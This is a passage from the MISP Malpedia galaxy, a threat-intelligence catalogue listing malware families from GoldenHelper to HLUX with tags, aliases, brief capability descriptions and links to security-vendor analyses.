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<td><a href="https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyaminschacombo-rebranded/">https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyaminschacombo-rebranded/</a></td>
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GoldenHelper
The tag is: misp-galaxy:malpedia="GoldenHelper"

GoldenHelper is also known as:

Table 1811. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenhelper">https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenhelper</a></td>
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GoldenSpy
The tag is: misp-galaxy:malpedia="GoldenSpy"
GoldenSpy is also known as:

Table 1812. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy">https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy</a></td>
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GoldMax

The tag is: misp-galaxy:malpedia="GoldMax"

GoldMax is also known as:

- SUNSHUTTLE

Table 1813. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.goldmax">https://malpedia.caad.fkie.fraunhofer.de/details/win.goldmax</a></td>
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<td><a href="https://x0r19x91.gitlab.io/post/malware-analysis/sunshuttle/">https://x0r19x91.gitlab.io/post/malware-analysis/sunshuttle/</a></td>
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<td><a href="https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/">https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/</a></td>
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GoldDragon

GoldDragon was a second-stage backdoor which established a permanent presence on the victim’s system once the first-stage, file-less, PowerShell-based attack leveraging steganography was executed. The initial attack was observed first in December 2017, when a Korean-language spear
phishing campaign targeted organizations linked with Pyeongchang Winter Olympics 2018. GoldDragon was delivered once the attacker had gained an initial foothold in the targeted environment.

The malware was capable of a basic reconnaissance, data exfiltration and downloading of additional components from its C&C server.

The tag is: misp-galaxy:malpedia=“GoldDragon”

GoldDragon is also known as:

Table 1814. Table References

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**Golroted**

The tag is: misp-galaxy:malpedia=“Golroted”

Golroted is also known as:

Table 1815. Table References

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**Gomorrah stealer**

The tag is: misp-galaxy:malpedia=“Gomorrah stealer”

Gomorrah stealer is also known as:

Table 1816. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.gomorrah_stealer">https://malpedia.caad.fkie.fraunhofer.de/details/win.gomorrah_stealer</a></td>
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<tr>
<td><a href="https://github.com/jstrosch/malware-samples/tree/master/binaries/gomorrah/2020/April">https://github.com/jstrosch/malware-samples/tree/master/binaries/gomorrah/2020/April</a></td>
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**Goodor**

The tag is: misp-galaxy:malpedia=“Goodor”

Goodor is also known as:

- Fuerboos
### GoogleDrive RAT

The tag is: `misp-galaxy:malpedia="GoogleDrive RAT"`

GoogleDrive RAT is also known as:

**Table 1818. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.google_drive_rat">https://malpedia.caad.fkie.fraunhofer.de/details/win.google_drive_rat</a></td>
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### GooPic Drooper

The tag is: `misp-galaxy:malpedia="GooPic Drooper"`

GooPic Drooper is also known as:

**Table 1819. Table References**

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<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.goopic">https://malpedia.caad.fkie.fraunhofer.de/details/win.goopic</a></td>
</tr>
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</table>

### GootKit

Gootkit is a banking trojan, where large parts are written in javascript (node.JS). It jumps to C/C++ library functions for various tasks.

The tag is: `misp-galaxy:malpedia="GootKit"`

GootKit is also known as:

- Waldek
- Xswkit
<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit">https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit</a></td>
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<tr>
<td><a href="https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/">https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/</a></td>
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<td><a href="https://dannyquist.github.io/gootkit-reversing-ghidra/">https://dannyquist.github.io/gootkit-reversing-ghidra/</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/">https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/</a></td>
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<td><a href="http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html">http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html</a></td>
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<td><a href="https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware">https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware</a></td>
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<td><a href="https://labs.sentinelone.com/gootkit-banking-trojan-deep-dive-anti-analysis-features/">https://labs.sentinelone.com/gootkit-banking-trojan-deep-dive-anti-analysis-features/</a></td>
</tr>
<tr>
<td><a href="https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps">https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps</a></td>
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<tr>
<td><a href="https://www.youtube.com/watch?v=242Tn0IL2jE">https://www.youtube.com/watch?v=242Tn0IL2jE</a></td>
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<td><a href="https://www.sentinelone.com/blog/gootkit-banking-trojan-persistence-other-capabilities/">https://www.sentinelone.com/blog/gootkit-banking-trojan-persistence-other-capabilities/</a></td>
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<td><a href="https://www.youtube.com/watch?v=QgULPvEE4aw">https://www.youtube.com/watch?v=QgULPvEE4aw</a></td>
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<tr>
<td><a href="https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/">https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/</a></td>
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<tr>
<td><a href="https://twitter.com/MsftSecInt/status/1366542130731094021">https://twitter.com/MsftSecInt/status/1366542130731094021</a></td>
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<td><a href="https://www.sentinelone.com/blog/gootkit-banking-trojan-deep-dive-anti-analysis-features/">https://www.sentinelone.com/blog/gootkit-banking-trojan-deep-dive-anti-analysis-features/</a></td>
</tr>
<tr>
<td><a href="https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/">https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/</a></td>
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<td><a href="https://www.us-cert.gov/ncas/alerts/TA16-336A">https://www.us-cert.gov/ncas/alerts/TA16-336A</a></td>
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Gophe

The tag is: misp-galaxy:malpedia="Gophe"

Gophe is also known as:

Table 1821. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gophe
https://github.com/strictlymike/presentations/tree/master/2020/2020.02.08_BSidesHuntsville

GovRAT

The tag is: misp-galaxy:malpedia="GovRAT"

GovRAT is also known as:

Table 1822. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat

Gozi


In 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed. It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.

In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.

The tag is: misp-galaxy:malpedia="Gozi"

Gozi is also known as:
• CRM
• Gozi CRM
• Papras
• Snifula
• Ursnif

Table 1823. Table References

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<td><a href="https://www.secureworks.com/research/gozi">https://www.secureworks.com/research/gozi</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/gold-swathmore">https://www.secureworks.com/research/threat-profiles/gold-swathmore</a></td>
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<td><a href="http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html">http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html</a></td>
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<td><a href="https://github.com/mlodic/ursnif_beacon_decryptor">https://github.com/mlodic/ursnif_beacon_decryptor</a></td>
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<td><a href="https://lokalhost.pl/gozi_tree.txt">https://lokalhost.pl/gozi_tree.txt</a></td>
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<td><a href="https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/">https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/</a></td>
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<td><a href="https://www.youtube.com/watch?v=BcFbkjUVc7o">https://www.youtube.com/watch?v=BcFbkjUVc7o</a></td>
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**GPCode**

The tag is: *misp-galaxy:malpedia=*GPCode*"*

GPCode is also known as:

Table 1824. Table References

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<td><a href="https://de.securelist.com/analysis/59479/erpresser/">https://de.securelist.com/analysis/59479/erpresser/</a></td>
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**GrabBot**

The tag is: *misp-galaxy:malpedia=*GrabBot*"*
GrabBot is also known as:

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<td><a href="http://blog.fortinet.com/2017/03/17/grabbot-is-back-to-nab-your-data">http://blog.fortinet.com/2017/03/17/grabbot-is-back-to-nab-your-data</a></td>
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**Graftor**

The tag is: `misp-galaxy:malpedia="Graftor"`

Graftor is also known as:

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<td><a href="http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html">http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html</a></td>
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**Grandoreiro**

According to ESET Research, Grandoreiro is a Latin American banking trojan targeting Brazil, Mexico, Spain and Peru. As such, it shows unusual effort by its authors to evade detection and emulation, and progress towards a modular architecture.

The tag is: `misp-galaxy:malpedia="Grandoreiro"`

Grandoreiro is also known as:

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<tr>
<td><a href="https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/">https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/</a></td>
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**GrandSteal**

The tag is: `misp-galaxy:malpedia="GrandSteal"`

GrandSteal is also known as:
Grateful POS

POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card's magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system's memory unencrypted while the system determines where to send it for authorization. Masked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was uploaded in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.

The tag is: misp-galaxy:malpedia="Grateful POS"

Grateful POS is also known as:

- FrameworkPOS
- SCRAPMINT
- trinity
Gratem

The tag is: misp-galaxy:malpedia="Gratem"

Gratem is also known as:

Table 1830. Table References

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Gravity RAT

The tag is: misp-galaxy:malpedia="Gravity RAT"

Gravity RAT is also known as:

Table 1831. Table References

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<td><a href="https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/">https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/</a></td>
</tr>
<tr>
<td><a href="https://securelist.com/gravityrat-the-spy-returns/99097/">https://securelist.com/gravityrat-the-spy-returns/99097/</a></td>
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GREASE

The tag is: misp-galaxy:malpedia="GREASE"

GREASE is also known as:

Table 1832. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.grease">https://malpedia.caad.fkie.fraunhofer.de/details/win.grease</a></td>
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<td><a href="https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/">https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/</a></td>
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GreenShaitan

The tag is: misp-galaxy:malpedia="GreenShaitan"

GreenShaitan is also known as:

• eoehttp

Table 1833. Table References

734
GreyEnergy

The tag is: *misp-galaxy:malpedia*="GreyEnergy"

GreyEnergy is also known as:

**Table 1834. Table References**

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<td><a href="https://www.eset.com/int/greyenergy-exposed/">https://www.eset.com/int/greyenergy-exposed/</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/iron-viking">https://www.secureworks.com/research/threat-profiles/iron-viking</a></td>
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<td><a href="https://www.nozominetworks.com/2019/02/12/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/">https://www.nozominetworks.com/2019/02/12/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/</a></td>
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<td><a href="https://github.com/NozomiNetworks/greyenergy-unpacker">https://github.com/NozomiNetworks/greyenergy-unpacker</a></td>
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</table>

GRILLMARK

This is a proxy-aware HTTP backdoor that is implemented as a service and uses the compromised system’s proxy settings to access the internet. C&C traffic is base64 encoded and the files sent to the server are compressed with aPLib.

The tag is: *misp-galaxy:malpedia*="GRILLMARK"

GRILLMARK is also known as:

- Hellsing Backdoor

**Table 1835. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.grillmark">https://malpedia.caad.fkie.fraunhofer.de/details/win.grillmark</a></td>
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<td><a href="https://content.fireeye.com/m-trends/rpt-m-trends-2019">https://content.fireeye.com/m-trends/rpt-m-trends-2019</a></td>
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GRIMAGENT

The tag is: misp-galaxy:malpedia="GRIMAGENT"

GRIMAGENT is also known as:

Table 1836. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.grimagent
https://twitter.com/bryceabdo/status/1352359414746009608

GROK

The tag is: misp-galaxy:malpedia="GROK"

GROK is also known as:

Table 1837. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.grok

GRUNT

The tag is: misp-galaxy:malpedia="GRUNT"

GRUNT is also known as:

Table 1838. Table References

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https://malpedia.caad.fkie.fraunhofer.de/details/win.grunt
https://twitter.com/ItsReallyNick/status/1208141697282117633

gsecdump

The tag is: misp-galaxy:malpedia="gsecdump"

gsecdump is also known as:

Table 1839. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump
https://attack.mitre.org/wiki/Technique/T1003
GUP Proxy Tool

The tag is: `misp-galaxy:malpedia="GUP Proxy Tool"`

GUP Proxy Tool is also known as:

*Table 1840. Table References*

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H1N1 Loader

The tag is: `misp-galaxy:malpedia="H1N1 Loader"`

H1N1 Loader is also known as:

*Table 1841. Table References*

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Hacksfase

The tag is: `misp-galaxy:malpedia="Hacksfase"`

Hacksfase is also known as:

*Table 1842. Table References*

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<tr>
<td><a href="https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf">securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf</a></td>
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</table>

HackSpy

Py2Exe based tool as found on github.

The tag is: `misp-galaxy:malpedia="HackSpy"`

HackSpy is also known as:

*Table 1843. Table References*
Hakbit

Hakbit ransomware is written in .NET. It uploads (some) files to be encrypted to a ftp-server. The ransom note is embedded - in earlier versions as plain string, then as base64 string. In some versions, these strings are slightly obfuscated.

Contact is via an email address hosted on protonmail. Hakbit (original) had hakbit@, more recent "KiraLock" has kiraransom@ (among others of course).

The tag is: misp-galaxy:malpedia="Hakbit"

Hakbit is also known as:

• Thanos Ransomware

Table 1844. Table References

Hamweq

The tag is: misp-galaxy:malpedia="Hamweq"

Hamweq is also known as:

Table 1845. Table References
Hancitor

Hancitor (aka Chanitor) emerged in 2013 which spread via social engineering techniques mainly through phishing mails embedded with malicious link and weaponized Microsoft office document contains malicious macro in it.

The tag is: misp-galaxy:malpedia="Hancitor"

Hancitor is also known as:

- Chanitor

Table 1846. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor">https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor</a></td>
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<td><a href="https://twitter.com/TheDFIRReport/status/1359669513520873473">https://twitter.com/TheDFIRReport/status/1359669513520873473</a></td>
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<td><a href="https://isc.sans.edu/forums/diary/Hancitor+activity+resumes+after+a+holiday+break/26980/">https://isc.sans.edu/forums/diary/Hancitor+activity+resumes+after+a+holiday+break/26980/</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html">https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html</a></td>
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<td><a href="https://www.uperesia.com/hancitor-packer-demystified">https://www.uperesia.com/hancitor-packer-demystified</a></td>
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HappyLocker (HiddenTear?)

The tag is: misp-galaxy:malpedia="HappyLocker (HiddenTear?)"

HappyLocker (HiddenTear?) is also known as:

Table 1847. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.happy_locker">https://malpedia.caad.fkie.fraunhofer.de/details/win.happy_locker</a></td>
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HARDRAIN (Windows)

The tag is: misp-galaxy:malpedia="HARDRAIN (Windows)"

HARDRAIN (Windows) is also known as:

Table 1848. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.hardrain">https://malpedia.caad.fkie.fraunhofer.de/details/win.hardrain</a></td>
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Harnig

The tag is: misp-galaxy:malpedia="Harnig"

Harnig is also known as:

- Piptea

Table 1849. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig">https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html">https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html</a></td>
</tr>
<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html">https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html</a></td>
</tr>
</tbody>
</table>
Havex RAT

Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as "Dragonfly" and "Energetic Bear". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.

Once installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.

Havex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries.

The tag is: misp-galaxy:malpedia="Havex RAT"

Havex RAT is also known as:

Table 1850. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat">https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat</a></td>
</tr>
<tr>
<td><a href="https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/">https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/iron-liberty">https://www.secureworks.com/research/threat-profiles/iron-liberty</a></td>
</tr>
</tbody>
</table>

HAWKBALL

HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.

The tag is: misp-galaxy:malpedia="HAWKBALL"

HAWKBALL is also known as:
**HawkEye Keylogger**

HawkEye is a keylogger that is distributed since 2013. Discovered by IBM X-Force, it is currently spread over phishing campaigns targeting businesses on a worldwide scale. It is designed to steal credentials from numerous applications but, in the last observed versions, new "loader capabilities" have been spotted. It is sold by its development team on dark web markets and hacking forums.

The tag is: *misp-galaxy:malpedia="HawkEye Keylogger"

HawkEye Keylogger is also known as:

- HawkEye
- HawkEye Reborn
- Predator Pain

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**Table 1852. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger">https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger</a></td>
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<td><a href="https://www.cyberbit.com/blog/endpoint-security/hawkeye-malware-keylogging-technique/">https://www.cyberbit.com/blog/endpoint-security/hawkeye-malware-keylogging-technique/</a></td>
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<td><a href="https://www.cyberbit.com/hawkeye-malware-keylogging-technique/">https://www.cyberbit.com/hawkeye-malware-keylogging-technique/</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/gold-galleon">https://www.secureworks.com/research/threat-profiles/gold-galleon</a></td>
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</table>
HDMR Ransomware

HDMR is a ransomware which encrypts user files and adds a .DMR64 extension. It also drops a ransom note named: "!!! READ THIS !!!.hta".

The tag is: misp-galaxy:malpedia="HDMR Ransomware"

HDMR Ransomware is also known as:

• GO-SPORT

Table 1853. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.hdmr">https://malpedia.caad.fkie.fraunhofer.de/details/win.hdmr</a></td>
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<td><a href="http://id-ransomware.blogspot.com/2019/10/hdmr-ransomware.html">http://id-ransomware.blogspot.com/2019/10/hdmr-ransomware.html</a></td>
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<td><a href="https://twitter.com/malwrhunterteam/status/1205096379711918080/photo/1">https://twitter.com/malwrhunterteam/status/1205096379711918080/photo/1</a></td>
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HDRoot

The tag is: misp-galaxy:malpedia="HDRoot"

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Table 1854. Table References

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<td><a href="https://securelist.com/i-am-hdroot-part-1/72275/">https://securelist.com/i-am-hdroot-part-1/72275/</a></td>
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<tr>
<td><a href="https://securelist.com/i-am-hdroot-part-2/72356/">https://securelist.com/i-am-hdroot-part-2/72356/</a></td>
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Helauto

The tag is: misp-galaxy:malpedia="Helauto"

Helauto is also known as:

Table 1855. Table References

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HelloKitty

The tag is: `misp-galaxy:malpedia="HelloKitty"`

HelloKitty is also known as:

- KittyCrypt

Table 1856. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.hellokitty">https://malpedia.caad.fkie.fraunhofer.de/details/win.hellokitty</a></td>
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<td><a href="https://twitter.com/fwosar/status/1359167108727332868">https://twitter.com/fwosar/status/1359167108727332868</a></td>
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Helminth

The tag is: `misp-galaxy:malpedia="Helminth"`

Helminth is also known as:

Table 1857. Table References

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<tr>
<td><a href="https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/">https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/</a></td>
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<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html">https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html</a></td>
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<td><a href="https://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability">https://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/">https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/cobalt-gypsy">https://www.secureworks.com/research/threat-profiles/cobalt-gypsy</a></td>
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Heloag

The tag is: `misp-galaxy:malpedia="Heloag"`
Heloag is also known as:

Table 1858. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag">https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag</a></td>
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**Herbst**

The tag is: `misp-galaxy:malpedia="Herbst"`

Herbst is also known as:

Table 1859. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.herbst">https://malpedia.caad.fkie.fraunhofer.de/details/win.herbst</a></td>
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<tr>
<td><a href="https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware">https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware</a></td>
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**Heriplor**

The tag is: `misp-galaxy:malpedia="Heriplor"`

Heriplor is also known as:

Table 1860. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor">https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor</a></td>
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<tr>
<td><a href="https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html">https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html</a></td>
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**Hermes**

The tag is: `misp-galaxy:malpedia="Hermes"`

Hermes is also known as:

Table 1861. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes">https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes</a></td>
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Hermes Ransomware

The tag is: misp-galaxy:malpedia="Hermes Ransomware"

Hermes Ransomware is also known as:

Table 1862. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom">https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom</a></td>
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<tr>
<td><a href="https://blog.dcso.de/enterprise-malware-as-a-service/">https://blog.dcso.de/enterprise-malware-as-a-service/</a></td>
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<tr>
<td><a href="https://www.youtube.com/watch?v=9nuo-AGg4p4">https://www.youtube.com/watch?v=9nuo-AGg4p4</a></td>
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<tr>
<td><a href="https://dcso.de/2019/03/18/enterprise-malware-as-a-service">https://dcso.de/2019/03/18/enterprise-malware-as-a-service</a></td>
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HerpesBot

The tag is: misp-galaxy:malpedia="HerpesBot"

HerpesBot is also known as:

Table 1863. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes">https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes</a></td>
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HesperBot

The tag is: misp-galaxy:malpedia="HesperBot"

HesperBot is also known as:

Table 1864. Table References
Hidden Bee

The tag is: `misp-galaxy:malpedia="Hidden Bee"`

Hidden Bee is also known as:

Table 1865. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot">https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot</a></td>
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<td><a href="https://www.freebuf.com/column/174581.html">https://www.freebuf.com/column/174581.html</a></td>
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<tr>
<td><a href="https://www.freebuf.com/column/175106.html">https://www.freebuf.com/column/175106.html</a></td>
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HiddenTear

HiddenTear is an open source ransomware developed by a Turkish programmer and later released as proof of concept on GitHub. The malware generates a local symmetric key in order to encrypt a configurable folder (/test was the default one) and it sends it to a centralized C&C server. Due to its small payload it was used as real attack vector over email phishing campaigns. Variants are still used in attacks.

The tag is: `misp-galaxy:malpedia="HiddenTear"`

HiddenTear is also known as:

- FuckUnicorn

Table 1866. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear">https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear</a></td>
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<td><a href="https://twitter.com/struppigel/status/950787783353884672">https://twitter.com/struppigel/status/950787783353884672</a></td>
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**HideDRV**

The tag is: `misp-galaxy:malpedia="HideDRV"`

HideDRV is also known as:

*Table 1867. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv">https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv</a></td>
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<td><a href="https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html">https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/iron-twilight">https://www.secureworks.com/research/threat-profiles/iron-twilight</a></td>
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</table>

**HIGHNOON**

According to FireEye, HIGHNOON is a backdoor that may consist of multiple components. The components may include a loader, a DLL, and a rootkit. Both the loader and the DLL may be dropped together, but the rootkit may be embedded in the DLL. The HIGHNOON loader may be designed to run as a Windows service.

The tag is: `misp-galaxy:malpedia="HIGHNOON"`

HIGHNOON is also known as:

*Table 1868. Table References*

<table>
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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.highnoon">https://malpedia.caad.fkie.fraunhofer.de/details/win.highnoon</a></td>
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<td><a href="https://twitter.com/MrDanPerez/status/1159461995013378048">https://twitter.com/MrDanPerez/status/1159461995013378048</a></td>
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<td><a href="https://content.fireeye.com/apt-41/rpt-apt41/">https://content.fireeye.com/apt-41/rpt-apt41/</a></td>
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HIGHNOON.BIN

The tag is: misp-galaxy:malpedia="HIGHNOON.BIN"

HIGHNOON.BIN is also known as:

Table 1869. Table References

| Links | |
|-------|-----------------
| https://malpedia.caad.fkie.fraunhofer.de/details/win.highnoon_bin |
| https://content.fireeye.com/apt-41/rpt-apt41/ |

HIGHNOTE

The tag is: misp-galaxy:malpedia="HIGHNOTE"

HIGHNOTE is also known as:

- ChyNode

Table 1870. Table References

| Links | |
|-------|-----------------
| https://malpedia.caad.fkie.fraunhofer.de/details/win.highnote |
| https://twitter.com/bkMSFT/status/1153994428949749761 |

HiKit

The tag is: misp-galaxy:malpedia="HiKit"

HiKit is also known as:

Table 1871. Table References

| Links | |
|-------|-----------------
| https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit |
| https://www.secureworks.com/research/threat-profiles/bronze-keystone |
| https://www.recordedfuture.com/hidden-lynx-analysis/ |
**himan**

The tag is: `misp-galaxy:malpedia="himan"`

himan is also known as:

**Table 1872. Table References**

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**Himera Loader**

The tag is: `misp-galaxy:malpedia="Himera Loader"`

Himera Loader is also known as:

**Table 1873. Table References**

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<td><a href="https://twitter.com/James_inthe_box/status/1260191589789392898">https://twitter.com/James_inthe_box/status/1260191589789392898</a></td>
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**Hisoka**

The tag is: `misp-galaxy:malpedia="Hisoka"`

Hisoka is also known as:

**Table 1874. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.hisoka">https://malpedia.caad.fkie.fraunhofer.de/details/win.hisoka</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/">https://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/</a></td>
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**Hi-Zor RAT**

The tag is: `misp-galaxy:malpedia="Hi-Zor RAT"`

Hi-Zor RAT is also known as:

**Table 1875. Table References**

| Links |
**HLUX**

The tag is: `misp-galaxy:malpedia="HLUX"`

